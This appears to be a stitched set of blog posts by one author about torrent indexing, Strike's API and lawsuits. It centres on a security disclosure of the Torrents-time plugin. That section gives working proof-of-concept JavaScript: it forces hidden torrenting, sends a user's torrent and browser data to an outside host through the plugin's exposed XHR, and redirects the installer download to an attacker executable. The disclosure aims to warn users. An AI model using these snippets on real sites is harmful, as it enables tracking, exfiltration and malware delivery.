When I shut down Strike last December, millions of users lost their go-to media site, developers who relied on my API lost access to the data, and everyone was left with the all too familiar thought of, “what now?”

   P2P file sharing services collectively suffer from the issue of monetization. Every new torrent tracker on the scene seems to be yet another end-all-be-all centralized source for content. Over time, everyone begins to rely on these sites, they grow larger and larger, the operators make a lot of money, eventually the MPAA or ███ gets angry and has the owners arrested and the site shut down, and the cycle begins anew.

   With Strike I attempted to do something new: a torrent search engine that didn’t present you with ads or sponsored content, and instead simply gave the user the ability to find information. Because I had no motivations of profit from it, I was able to make the data free and open for anyone to use, but it still suffered from the issue of being centralized.

   For Strike’s final (and abandoned) version, I created a prototype that solved this issue; by creating software that runs on a local system and crawls DHT for infohashes, it cuts out the need for an HTTP-based solution. By writing software that indexes file information into a full-text searchable format, you’ve already solved the problem. While this process can be slow, the data set grows over time, and you can ensure that the data remains fresh by monitoring active swarms.

   The key to healthy growth, no matter the subject, is to keep development simple. A server counterpart to this should only do a couple of things:

1. Collect file information from hashes
2. Query said data
3. Allow plugins to handle said data

   By creating the means to collect and parse the data, you’ve done your part. The plugin system means its up for developers to handle the data however they wish. This results in the community constantly creating new solutions to problems and a strive for innovation.

   Imagine that someone creates a plugin that allows you to connect to another person or another community’s database, where you can then search for things in both datasets and merge the two. While this would be possible with a plugin-enabled centralized community, users would know that they will always have the same data available to them at all times.

   It’s time we said good bye to the traditional trackers and became self-reliant. So long as torrent trackers remain malware-infested hubs with top 100 lists, we are never going to see P2P’s image as a piracy haven begin to heal.

Thanks for reading,

Follow me on twitter

Check out Ulterius

What is Torrents-time

A “new” method of streaming torrents in your web browser, based around existing technologies Torrents-time was quickly adopted by a majority of torrent sites due to its ability to embed a player on the page to stream video content from torrents.

Tear down

Torrents-time bind the following ports

• 8082:nodejs webserver
• 12400:main application
• 9220:web socket server

Exposed API

• https://localhost.ttconfig.xyz:12400/api.js
• https://127.0.0.1:12400/api.js - leads to a insecure https connection, it listens for request.
• https://localhost.ttconfig.xyz:12400/vpnpropmt?version=r1 - block this and all things related to it. Anonymous VPN are very untrustworthy and make you the product.

3rd parties being called (why would you do this)

• 1337.to
• moviedb
• anonymousvpn

Profiting from VPN “partnership”, trusting a random VPN service is a writeup for another day.

Attack Vectors

This service stupidly abuses CORS, even worse it exposes a CORS enabled XHR object after requesting an instance of the plugin. So lets take advantage of that.

We don’t need anything more to do this attack than

<html> <title>Hello World</title> <head lang="en"> <script src="torrents.js"></script> <script src="https://localhost.ttconfig.xyz:12400/api.js"></script> <script src="attack.js"></script> <meta charset="UTF-8"> <title></title> </head> <body> </body> </html> 

Where torrents.js is their CDN code, once we have the first two scripts loaded attack.js can make use of all of torrentsTime useful functions on any page.

So in a few seconds we can get torrentTime on any HTML5 page, that’s great!

Except now I’m free to do a few things.

Concern 1 - Forced Piracy

Because I can make an invisible player, I’m free to force you to torrent whatever I like, even if you had no intention of streaming said content with a line of code

torrentsTime.instances.i0.start();

Great, you were just forced to torrent illegal content insecurely. You can do this for an unlimited amount of content. I can use any publisher ID as well.

Concern 2 - User Tracking/Privacy

Lets say I’m an advertiser/group with access to javascript on a website, with a few lines of code, not only can I tell who you are, I can send all that data using torrentsTime very exposed xhr object.

function driveBy() { //Torrents-time detected! //i0 is the first instance, loop over instances to get all currently started torrents var torrentTitle = torrentsTime.instances.i0.setup.title; var browser = torrentsTime.instances.i0.setup.browser; var filetype = torrentsTime.instances.i0.setup.fileType; //any other code we want to do on the page //this supports callback/JSONP //use the exposed xhr torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" +filetype, callback); } function callback(data) { console.log(data); } 

Instant results

Concern 3 - Even more privacy issues

Every time you make a request to the CDN the following data is logged by Torrents-time servers

IP, location (country), user agent, cookies, and and likely the exact page you requested the CDN from. Further more within the C code you can see the use of private keys masking SOMETHING which does indeed make http request, I’ve yet to break this.

Concern 4 - It runs as root on OSX

It runs as root on OSX. I really don’t need to say more.

Concern 5 - Redirect Plugin DownloadX

Redirecting the download for the plugin is again only a single line of code torrentsTime.setup.installerURL.windows = "https://andrew.im/sandbox/torrentsTime-download.exe"; After that you just fire torrentsTime.downloadInstaller(); Or when a user clicks the plugin download, they will be greeted with a legit looking prompt

Concern 6 - XSS

Seems just about every site with TT installed is vunerable to XSS now.

Concern 7 - Sky rocket cpu usage/crash it

Literally just ping the server with 1024 bytes and the cpu usage stays between 50% and 80%, no idea why this one even occurs. Program later crashes when sending random strings, so possible bufferoverflow waiting to be exploited.

Concern 8 - Bundled Certs

includes the private keys to their for ‘encrypted’ comms channel. Details here UPDATE their cert for localhost has been revoked.

Resources

You can download Torrents-time c-code here, as well as all the NODEJS used on your computer

https://mega.nz/#F!pklQQChQ!1VCTBgQQ9ticT8rm_TzGRw

Threat level

Seriously, remove this software from your computer, if you put it on your site, remove it, if you think about adding it, don’t. More exploits coming soon!

Contact

Andrew Sampson

• @Andrewmd5
• Email: [email protected]

I implore Congress to amend the statute to reflect the realities of file sharing. There is something wrong with a law that routinely threatens teenagers and students with astronomical penalties for an activity whose implications they may not have fully understood. The injury to the copyright holder may be real, and even substantial, but, under the statute, the record companies do not even have to prove actual damage.

In the US courts its not about who is right or wrong, people can judge this for themselves, its about how much money can you spend. My only fear is that this lawsuit opens up other websites and services to attack. Aurous operated in the blind, our client just allowed people to utilize the API’s of 3rd party websites (YouTube, Soundcloud), even then look where we ended up.

https://getstrike.net/api/torrents/top/?category=all

You can get the top 100 for a category 

for example anime would be

https://getstrike.net/api/torrents/top/?category=Anime

Here is a list of all valid categories 

Anime
Applications
Books
Games
HD Video Deprecated

Movies
Music
Other
TV
XXX

Once the new API/Core engine rewrites come (sometime after I move) you’ll have a ton more filtering options, so don’t worry. this will include sub categories and what not.

Enjoy. index will be updated once an hour just like everything else